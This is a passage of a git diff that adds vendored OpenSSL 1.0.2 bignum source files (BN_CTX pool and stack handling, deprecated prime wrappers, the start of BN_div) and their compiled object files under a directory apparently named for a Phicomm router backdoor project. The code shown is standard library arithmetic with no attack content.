+            pool = pool->next;
+        }
+        fprintf(stderr, "\n");
+    }
+#endif
+    BN_STACK_finish(&ctx->stack);
+    BN_POOL_finish(&ctx->pool);
+    OPENSSL_free(ctx);
+}
+
+void BN_CTX_start(BN_CTX *ctx)
+{
+    CTXDBG_ENTRY("BN_CTX_start", ctx);
+    /* If we're already overflowing ... */
+    if (ctx->err_stack || ctx->too_many)
+        ctx->err_stack++;
+    /* (Try to) get a new frame pointer */
+    else if (!BN_STACK_push(&ctx->stack, ctx->used)) {
+        BNerr(BN_F_BN_CTX_START, BN_R_TOO_MANY_TEMPORARY_VARIABLES);
+        ctx->err_stack++;
+    }
+    CTXDBG_EXIT(ctx);
+}
+
+void BN_CTX_end(BN_CTX *ctx)
+{
+    CTXDBG_ENTRY("BN_CTX_end", ctx);
+    if (ctx->err_stack)
+        ctx->err_stack--;
+    else {
+        unsigned int fp = BN_STACK_pop(&ctx->stack);
+        /* Does this stack frame have anything to release? */
+        if (fp < ctx->used)
+            BN_POOL_release(&ctx->pool, ctx->used - fp);
+        ctx->used = fp;
+        /* Unjam "too_many" in case "get" had failed */
+        ctx->too_many = 0;
+    }
+    CTXDBG_EXIT(ctx);
+}
+
+BIGNUM *BN_CTX_get(BN_CTX *ctx)
+{
+    BIGNUM *ret;
+    CTXDBG_ENTRY("BN_CTX_get", ctx);
+    if (ctx->err_stack || ctx->too_many)
+        return NULL;
+    if ((ret = BN_POOL_get(&ctx->pool)) == NULL) {
+        /*
+         * Setting too_many prevents repeated "get" attempts from cluttering
+         * the error stack.
+         */
+        ctx->too_many = 1;
+        BNerr(BN_F_BN_CTX_GET, BN_R_TOO_MANY_TEMPORARY_VARIABLES);
+        return NULL;
+    }
+    /* OK, make sure the returned bignum is "zero" */
+    BN_zero(ret);
+    ctx->used++;
+    CTXDBG_RET(ctx, ret);
+    return ret;
+}
+
+/************/
+/* BN_STACK */
+/************/
+
+static void BN_STACK_init(BN_STACK *st)
+{
+    st->indexes = NULL;
+    st->depth = st->size = 0;
+}
+
+static void BN_STACK_finish(BN_STACK *st)
+{
+    if (st->size)
+        OPENSSL_free(st->indexes);
+}
+
+#ifndef OPENSSL_NO_DEPRECATED
+static void BN_STACK_reset(BN_STACK *st)
+{
+    st->depth = 0;
+}
+#endif
+
+static int BN_STACK_push(BN_STACK *st, unsigned int idx)
+{
+    if (st->depth == st->size)
+        /* Need to expand */
+    {
+        unsigned int newsize = (st->size ?
+                                (st->size * 3 / 2) : BN_CTX_START_FRAMES);
+        unsigned int *newitems = OPENSSL_malloc(newsize *
+                                                sizeof(unsigned int));
+        if (!newitems)
+            return 0;
+        if (st->depth)
+            memcpy(newitems, st->indexes, st->depth * sizeof(unsigned int));
+        if (st->size)
+            OPENSSL_free(st->indexes);
+        st->indexes = newitems;
+        st->size = newsize;
+    }
+    st->indexes[(st->depth)++] = idx;
+    return 1;
+}
+
+static unsigned int BN_STACK_pop(BN_STACK *st)
+{
+    return st->indexes[--(st->depth)];
+}
+
+/***********/
+/* BN_POOL */
+/***********/
+
+static void BN_POOL_init(BN_POOL *p)
+{
+    p->head = p->current = p->tail = NULL;
+    p->used = p->size = 0;
+}
+
+static void BN_POOL_finish(BN_POOL *p)
+{
+    while (p->head) {
+        unsigned int loop = 0;
+        BIGNUM *bn = p->head->vals;
+        while (loop++ < BN_CTX_POOL_SIZE) {
+            if (bn->d)
+                BN_clear_free(bn);
+            bn++;
+        }
+        p->current = p->head->next;
+        OPENSSL_free(p->head);
+        p->head = p->current;
+    }
+}
+
+#ifndef OPENSSL_NO_DEPRECATED
+static void BN_POOL_reset(BN_POOL *p)
+{
+    BN_POOL_ITEM *item = p->head;
+    while (item) {
+        unsigned int loop = 0;
+        BIGNUM *bn = item->vals;
+        while (loop++ < BN_CTX_POOL_SIZE) {
+            if (bn->d)
+                BN_clear(bn);
+            bn++;
+        }
+        item = item->next;
+    }
+    p->current = p->head;
+    p->used = 0;
+}
+#endif
+
+static BIGNUM *BN_POOL_get(BN_POOL *p)
+{
+    if (p->used == p->size) {
+        BIGNUM *bn;
+        unsigned int loop = 0;
+        BN_POOL_ITEM *item = OPENSSL_malloc(sizeof(BN_POOL_ITEM));
+        if (!item)
+            return NULL;
+        /* Initialise the structure */
+        bn = item->vals;
+        while (loop++ < BN_CTX_POOL_SIZE)
+            BN_init(bn++);
+        item->prev = p->tail;
+        item->next = NULL;
+        /* Link it in */
+        if (!p->head)
+            p->head = p->current = p->tail = item;
+        else {
+            p->tail->next = item;
+            p->tail = item;
+            p->current = item;
+        }
+        p->size += BN_CTX_POOL_SIZE;
+        p->used++;
+        /* Return the first bignum from the new pool */
+        return item->vals;
+    }
+    if (!p->used)
+        p->current = p->head;
+    else if ((p->used % BN_CTX_POOL_SIZE) == 0)
+        p->current = p->current->next;
+    return p->current->vals + ((p->used++) % BN_CTX_POOL_SIZE);
+}
+
+static void BN_POOL_release(BN_POOL *p, unsigned int num)
+{
+    unsigned int offset = (p->used - 1) % BN_CTX_POOL_SIZE;
+    p->used -= num;
+    while (num--) {
+        bn_check_top(p->current->vals + offset);
+        if (!offset) {
+            offset = BN_CTX_POOL_SIZE - 1;
+            p->current = p->current->prev;
+        } else
+            offset--;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_ctx.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_ctx.o
new file mode 100644
index 0000000000000000000000000000000000000000..4ec5b01806862d245cbe9d1fdc265d1d5acaad56
GIT binary patch
literal 3776
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_depr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_depr.c
new file mode 100644
index 0000000..34895f5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_depr.c
@@ -0,0 +1,115 @@
+/* crypto/bn/bn_depr.c */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * Support for deprecated functions goes here - static linkage will only
+ * slurp this code if applications are using them directly.
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+#include <openssl/rand.h>
+
+static void *dummy = &dummy;
+
+#ifndef OPENSSL_NO_DEPRECATED
+BIGNUM *BN_generate_prime(BIGNUM *ret, int bits, int safe,
+                          const BIGNUM *add, const BIGNUM *rem,
+                          void (*callback) (int, int, void *), void *cb_arg)
+{
+    BN_GENCB cb;
+    BIGNUM *rnd = NULL;
+    int found = 0;
+
+    BN_GENCB_set_old(&cb, callback, cb_arg);
+
+    if (ret == NULL) {
+        if ((rnd = BN_new()) == NULL)
+            goto err;
+    } else
+        rnd = ret;
+    if (!BN_generate_prime_ex(rnd, bits, safe, add, rem, &cb))
+        goto err;
+
+    /* we have a prime :-) */
+    found = 1;
+ err:
+    if (!found && (ret == NULL) && (rnd != NULL))
+        BN_free(rnd);
+    return (found ? rnd : NULL);
+}
+
+int BN_is_prime(const BIGNUM *a, int checks,
+                void (*callback) (int, int, void *), BN_CTX *ctx_passed,
+                void *cb_arg)
+{
+    BN_GENCB cb;
+    BN_GENCB_set_old(&cb, callback, cb_arg);
+    return BN_is_prime_ex(a, checks, ctx_passed, &cb);
+}
+
+int BN_is_prime_fasttest(const BIGNUM *a, int checks,
+                         void (*callback) (int, int, void *),
+                         BN_CTX *ctx_passed, void *cb_arg,
+                         int do_trial_division)
+{
+    BN_GENCB cb;
+    BN_GENCB_set_old(&cb, callback, cb_arg);
+    return BN_is_prime_fasttest_ex(a, checks, ctx_passed,
+                                   do_trial_division, &cb);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_depr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_depr.o
new file mode 100644
index 0000000000000000000000000000000000000000..ab872cfe7bbf8264ddc47ed58392bc2987adee2c
GIT binary patch
literal 2472
zcmb`I--{bn6vuCVw2d~M#8M^D*3QFJBDO=~3f4YIvd!+!+G)3Sv-qH8nrx=c+THAu
z++ZrA4{L;BEBIicPyHJT^`TEC^argz6zprEtRU!v3yLpd3+wmH+`G9uJBuJ5I63Ej
z?m1`fy=Ug;i!pmV9*Z$4G4?JSjwEHQxpU~3e7D5*ur&KK^XlK_>ZJF4X4>+eS<Anb
z8rDkka2_F+S22zi2i8i(IRBtx=v3DBY@<LEd8@zP9kJo%ifa~V)~gz6j~l69srm|>
z6#%P`d`#LXlAHAI@t5tdZ9})cUy5sfV1H1`T)l7gpJcwhbE^My=IY?fJ3QTA>!uJB
zM6BJSigu>5N=rG`uttLQ@g4rWwS2E+d#fLwD}QvCc7r|SC%qpn?}tr0$zdnnPY;qt
zu#Jj=2Vh}A2`n{-y8HZn59{WYf{#(K;(Z^kNhgq+^j0?tSO2vpn>caexSpS>cU!!x
zzhjP=g`>r{yZ*5F`I`l^@Yd@A#<r8tEOZBS;`9uQGd3WWfRgMB42ymGK8y9TvHj^?
zsc*2wBj5+b+#|B%TJ}o3qUF9ylr?=hIia18f2ZjHWi30ZrKpZA;?I(`v_jkpcth~2
z<R`V1KwAu*Zj$}6zGVU+5&32km%G`VmGF1Jnb9c0l$TkVPOx3dXy_(b^l}sasSe}F
z+YQ~TtkXX`u!B(QLs&)tqWJM`_|!K1gKc;doYo`P;r9lNZxg>P;tx?HAb!tauR){M
z$?7eq;V!k!SvGpwx#+gsc8$BvQhRQ}WzK{>HCncvsqyjYv8q!okJ@7n#kJf|wuU=y
zkKl#2i%h4(YqOV}+2$qZLTzrICgwV#tm2CtIfd8`=Wd6q@f(nWr)g6V`Ua?1&({O_
zj39(~8Y=m9f)L_+ppxGv2qCUPC6`wzaXK%_UlHdSj-OHZUM2oxg{$>-#E{@S_SGNY
z=ZtV9m;I*xlSnT6%FNE?1zxMe@^)aG(rdf(HIutN&df%Q*O*!FbeK82xUk^1z*>vk
zHF1|5^;;yy7h7F(slB-5w)tgd`W4(JdRfD3@PCMoB6K9-FSi6n(h=tsjDlF{lid%c
zvoAqa`JEtS;QuoAA}p1XUwlsR*8~sWG&e)f72(Pa5D>agspfypFCv#7Re-7@pZ|sm
z;mc)7OZSQN)zGI=Fe3InFuEP-JyK;=<m)PgFV9cnIvffO=S$F&fx?FK&w)qv?*{#`
zL9D>|{i9r&FZ&nyY{d1%f*y)}(4Fu?L_V=_?|@iIygxT+pol29L0*CvmH(Gm|NKT|
I;Dq!40bQC?I{*Lx

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_div.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_div.c
new file mode 100644
index 0000000..72e6ce3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_div.c
@@ -0,0 +1,477 @@
+/* crypto/bn/bn_div.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/bn.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+/* The old slow way */
+#if 0
+int BN_div(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m, const BIGNUM *d,
+           BN_CTX *ctx)
+{
+    int i, nm, nd;
+    int ret = 0;
+    BIGNUM *D;
+
+    bn_check_top(m);
+    bn_check_top(d);
+    if (BN_is_zero(d)) {
+        BNerr(BN_F_BN_DIV, BN_R_DIV_BY_ZERO);
+        return (0);
+    }
+
+    if (BN_ucmp(m, d) < 0) {
+        if (rem != NULL) {
+            if (BN_copy(rem, m) == NULL)
+                return (0);
+        }
+        if (dv != NULL)
+            BN_zero(dv);
+        return (1);
+    }
+
+    BN_CTX_start(ctx);
+    D = BN_CTX_get(ctx);
+    if (dv == NULL)
+        dv = BN_CTX_get(ctx);
+    if (rem == NULL)
+        rem = BN_CTX_get(ctx);
+    if (D == NULL || dv == NULL || rem == NULL)
+        goto end;
+
+    nd = BN_num_bits(d);
+    nm = BN_num_bits(m);
+    if (BN_copy(D, d) == NULL)
+        goto end;
+    if (BN_copy(rem, m) == NULL)
+        goto end;
+
+    /*
+     * The next 2 are needed so we can do a dv->d[0]|=1 later since
+     * BN_lshift1 will only work once there is a value :-)
+     */
+    BN_zero(dv);
+    if (bn_wexpand(dv, 1) == NULL)
+        goto end;
+    dv->top = 1;
+
+    if (!BN_lshift(D, D, nm - nd))
+        goto end;
+    for (i = nm - nd; i >= 0; i--) {
+        if (!BN_lshift1(dv, dv))
+            goto end;
+        if (BN_ucmp(rem, D) >= 0) {
+            dv->d[0] |= 1;
+            if (!BN_usub(rem, rem, D))
+                goto end;
+        }
+/* CAN IMPROVE (and have now :=) */
+        if (!BN_rshift1(D, D))
+            goto end;
+    }
+    rem->neg = BN_is_zero(rem) ? 0 : m->neg;
+    dv->neg = m->neg ^ d->neg;
+    ret = 1;
+ end:
+    BN_CTX_end(ctx);
+    return (ret);
+}
+
+#else
+
+# if !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM) \
+    && !defined(PEDANTIC) && !defined(BN_DIV3W)
+#  if defined(__GNUC__) && __GNUC__>=2
+#   if defined(__i386) || defined (__i386__)
+   /*-
+    * There were two reasons for implementing this template:
+    * - GNU C generates a call to a function (__udivdi3 to be exact)
+    *   in reply to ((((BN_ULLONG)n0)<<BN_BITS2)|n1)/d0 (I fail to
+    *   understand why...);
+    * - divl doesn't only calculate quotient, but also leaves
+    *   remainder in %edx which we can definitely use here:-)
+    *
+    *                                   <appro@fy.chalmers.se>
+    */
+#    undef bn_div_words
+#    define bn_div_words(n0,n1,d0)                \
+        ({  asm volatile (                      \
+                "divl   %4"                     \
+                : "=a"(q), "=d"(rem)            \
+                : "a"(n1), "d"(n0), "g"(d0)     \
+                : "cc");                        \
+            q;                                  \
+        })
+#    define REMAINDER_IS_ALREADY_CALCULATED
+#   elif defined(__x86_64) && defined(SIXTY_FOUR_BIT_LONG)
+   /*
+    * Same story here, but it's 128-bit by 64-bit division. Wow!
+    *                                   <appro@fy.chalmers.se>
+    */
+#    undef bn_div_words
+#    define bn_div_words(n0,n1,d0)                \
+        ({  asm volatile (                      \
+                "divq   %4"                     \
+                : "=a"(q), "=d"(rem)            \
+                : "a"(n1), "d"(n0), "g"(d0)     \
+                : "cc");                        \
+            q;                                  \
+        })
+#    define REMAINDER_IS_ALREADY_CALCULATED
+#   endif                       /* __<cpu> */
+#  endif                        /* __GNUC__ */
+# endif                         /* OPENSSL_NO_ASM */
+
+/*-
+ * BN_div computes  dv := num / divisor,  rounding towards
+ * zero, and sets up rm  such that  dv*divisor + rm = num  holds.
+ * Thus:
+ *     dv->neg == num->neg ^ divisor->neg  (unless the result is zero)
+ *     rm->neg == num->neg                 (unless the remainder is zero)
+ * If 'dv' or 'rm' is NULL, the respective value is not returned.
+ */
+int BN_div(BIGNUM *dv, BIGNUM *rm, const BIGNUM *num, const BIGNUM *divisor,
+           BN_CTX *ctx)
+{
+    int norm_shift, i, loop;
+    BIGNUM *tmp, wnum, *snum, *sdiv, *res;
+    BN_ULONG *resp, *wnump;
+    BN_ULONG d0, d1;
+    int num_n, div_n;
+    int no_branch = 0;
+
+    /*
+     * Invalid zero-padding would have particularly bad consequences so don't
+     * just rely on bn_check_top() here (bn_check_top() works only for
+     * BN_DEBUG builds)
+     */
+    if ((num->top > 0 && num->d[num->top - 1] == 0) ||
+        (divisor->top > 0 && divisor->d[divisor->top - 1] == 0)) {
+        BNerr(BN_F_BN_DIV, BN_R_NOT_INITIALIZED);
+        return 0;
+    }
+
+    bn_check_top(num);
+    bn_check_top(divisor);
+
+    if ((BN_get_flags(num, BN_FLG_CONSTTIME) != 0)
+        || (BN_get_flags(divisor, BN_FLG_CONSTTIME) != 0)) {
+        no_branch = 1;
+    }
+
+    bn_check_top(dv);
+    bn_check_top(rm);
+    /*- bn_check_top(num); *//*
+     * 'num' has been checked already
+     */
+    /*- bn_check_top(divisor); *//*
+     * 'divisor' has been checked already
+     */
+
+    if (BN_is_zero(divisor)) {
+        BNerr(BN_F_BN_DIV, BN_R_DIV_BY_ZERO);
+        return (0);
+    }
+
+    if (!no_branch && BN_ucmp(num, divisor) < 0) {
+        if (rm != NULL) {
+            if (BN_copy(rm, num) == NULL)
+                return (0);
+        }
+        if (dv != NULL)
+            BN_zero(dv);
+        return (1);
+    }
+
+    BN_CTX_start(ctx);
+    tmp = BN_CTX_get(ctx);
+    snum = BN_CTX_get(ctx);
+    sdiv = BN_CTX_get(ctx);
+    if (dv == NULL)
+        res = BN_CTX_get(ctx);
+    else
+        res = dv;
+    if (sdiv == NULL || res == NULL || tmp == NULL || snum == NULL)
+        goto err;
+
+    /* First we normalise the numbers */
+    norm_shift = BN_BITS2 - ((BN_num_bits(divisor)) % BN_BITS2);
+    if (!(BN_lshift(sdiv, divisor, norm_shift)))
+        goto err;
+    sdiv->neg = 0;
+    norm_shift += BN_BITS2;
+    if (!(BN_lshift(snum, num, norm_shift)))
+        goto err;
+    snum->neg = 0;
+
+    if (no_branch) {
+        /*
+         * Since we don't know whether snum is larger than sdiv, we pad snum
+         * with enough zeroes without changing its value.
+         */
+        if (snum->top <= sdiv->top + 1) {
+            if (bn_wexpand(snum, sdiv->top + 2) == NULL)
+                goto err;
+            for (i = snum->top; i < sdiv->top + 2; i++)
+                snum->d[i] = 0;
+            snum->top = sdiv->top + 2;
+        } else {
+            if (bn_wexpand(snum, snum->top + 1) == NULL)
+                goto err;
+            snum->d[snum->top] = 0;
+            snum->top++;
+        }
+    }
+
+    div_n = sdiv->top;
+    num_n = snum->top;
+    loop = num_n - div_n;
+    /*
+     * Lets setup a 'window' into snum This is the part that corresponds to
+     * the current 'area' being divided
+     */
+    wnum.neg = 0;
+    wnum.d = &(snum->d[loop]);
+    wnum.top = div_n;
+    /*
+     * only needed when BN_ucmp messes up the values between top and max
+     */
+    wnum.dmax = snum->dmax - loop; /* so we don't step out of bounds */
+
+    /* Get the top 2 words of sdiv */
+    /* div_n=sdiv->top; */
+    d0 = sdiv->d[div_n - 1];
+    d1 = (div_n == 1) ? 0 : sdiv->d[div_n - 2];
+
+    /* pointer to the 'top' of snum */
+    wnump = &(snum->d[num_n - 1]);
+
+    /* Setup to 'res' */
+    res->neg = (num->neg ^ divisor->neg);
+    if (!bn_wexpand(res, (loop + 1)))
+        goto err;
+    res->top = loop - no_branch;
+    resp = &(res->d[loop - 1]);
+
+    /* space for temp */
+    if (!bn_wexpand(tmp, (div_n + 1)))
+        goto err;
+
+    if (!no_branch) {
+        if (BN_ucmp(&wnum, sdiv) >= 0) {
+            /*
+             * If BN_DEBUG_RAND is defined BN_ucmp changes (via bn_pollute)
+             * the const bignum arguments => clean the values between top and
+             * max again
+             */
+            bn_clear_top2max(&wnum);
+            bn_sub_words(wnum.d, wnum.d, sdiv->d, div_n);
+            *resp = 1;
+        } else
+            res->top--;
+    }
+
+    /*
+     * if res->top == 0 then clear the neg value otherwise decrease the resp
+     * pointer
+     */
+    if (res->top == 0)
+        res->neg = 0;
+    else
+        resp--;
+
+    for (i = 0; i < loop - 1; i++, wnump--, resp--) {
+        BN_ULONG q, l0;
+        /*
+         * the first part of the loop uses the top two words of snum and sdiv
+         * to calculate a BN_ULONG q such that | wnum - sdiv * q | < sdiv
+         */
+# if defined(BN_DIV3W) && !defined(OPENSSL_NO_ASM)
+        BN_ULONG bn_div_3_words(BN_ULONG *, BN_ULONG, BN_ULONG);
+        q = bn_div_3_words(wnump, d1, d0);
+# else
+        BN_ULONG n0, n1, rem = 0;
+
+        n0 = wnump[0];
+        n1 = wnump[-1];
+        if (n0 == d0)
+            q = BN_MASK2;
+        else {                  /* n0 < d0 */
+
+#  ifdef BN_LLONG
+            BN_ULLONG t2;
+
+#   if defined(BN_LLONG) && defined(BN_DIV2W) && !defined(bn_div_words)
+            q = (BN_ULONG)(((((BN_ULLONG) n0) << BN_BITS2) | n1) / d0);
+#   else
+            q = bn_div_words(n0, n1, d0);
+#    ifdef BN_DEBUG_LEVITTE
